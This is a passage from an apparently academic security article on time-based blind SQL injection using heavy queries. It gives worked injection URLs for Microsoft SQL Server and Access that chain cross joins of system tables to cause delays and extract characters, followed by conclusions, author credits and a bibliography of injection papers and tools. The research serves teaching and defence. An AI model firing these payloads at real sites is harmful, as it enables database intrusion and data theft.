基于时间的大量查询下盲SQL注入技术

And then we start with the second letter:

http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 150 >(select top 1 ascii(substring(name,1,1)) from sysusers) → ?

Example 2: Microsoft Access. Using the MSysAccessObjects table.

http://www.informatica64.com/retohacking/pista.aspx?id_pista=1 and (SELECT count(*) FROM MSysAccessObjects A 20T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6, MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10)>0 and exists (select * from contrasena)

In this example you see a heavy query for Microsoft Access databases with a delay of six seconds. An attacker can extract all information using the same method shown in the Microsoft SQL Server example and using this heavy query as a second condition in the “where" clause to delay the response. 

Conclusions

Taking into consideration the methods described above, we can see that having access to stored procedures for Microsoft SQL Server and Oracle is needed to be able to generate time delays using calls to Wait-for methods and DBMS_LOCK. However, this is not necessary on MySQL engines, because in this case a mathematic function is used to generate the time delay. Some Intrusion Detection Systems (IDS) and Firewall applications have the ability to block the URLs that use Benchmark functions.

Authors

The information presented here is extracted from the PhD thesis Chema Alonso (Microsoft Windows Security MVP, Systems Engineer, Rey Juan Carlos University) is currently working on under the direction of Dr. Antonio Guzmán (Systems Engineering Doctor, Rey Juan Carlos University) and Dr. Marta Beltran (Systems Engineering Doctor, Rey Juan Carlos University).

Mr. Daniel Kachakil (Systems Engineer and Master on Software Engineering, University Politécnica of Valencia) and Mr. Rodolfo Bordón (System Security Consultant and Software Specialist Technician) have also helped produce also contributed to this article by assisting with response time tests in different environments. 

Bibliography

[1] “(more) Advanced SQL Injection” by Chris Anley, NGS Software
URL: http://www.nextgenss.com/papers/more_advanced_sql_injection.pdf
[2] “Blindfolded SQL Injection” by Ofer Maor and Amichai Shulman, Imperva
URL: http://www.imperva.com/application_defense_center/white_papers/blind_sql_server_injection.html
[3] “Blind SQL Injection Automation Techniques” by Cameron Hotchkies, BlackHat Conferences
URL: https://www.blackhat.com/presentations/bh-usa-04/bh-us-04-hotchkies/bh-us-04-hotchkies.pdf
[4] “Absinthe” by Cameron Hotchkies, 0x90.
URL: http://www.0x90.org/releases/absinthe/download.php
[5] “Data Mining with SQL Injection and Inference” by David Litchfield, NGS Software
URL: http://www.ngssoftware.com/research/papers/sqlinference.pdf
[6] “SQL Injection Cheat Sheet” by Ronald van den Heetkamp, 0x000000
URL: http://www.0x000000.com/?i=14&bin=1110
[7] “ Solar Empire Exploit” by Blackhawk. Milw0rm.
URL: http://www.milw0rm.com/exploits/4078
[8] “…a SQL Server Injection & takeover tool… ” by icesurfer, SQLNinja
URL: http://sqlninja.sourceforge.net
[9] “SQL PowerInjector” by Francois Larouche, SQL PowerInjector
URL: http://www.sqlpowerinjector.com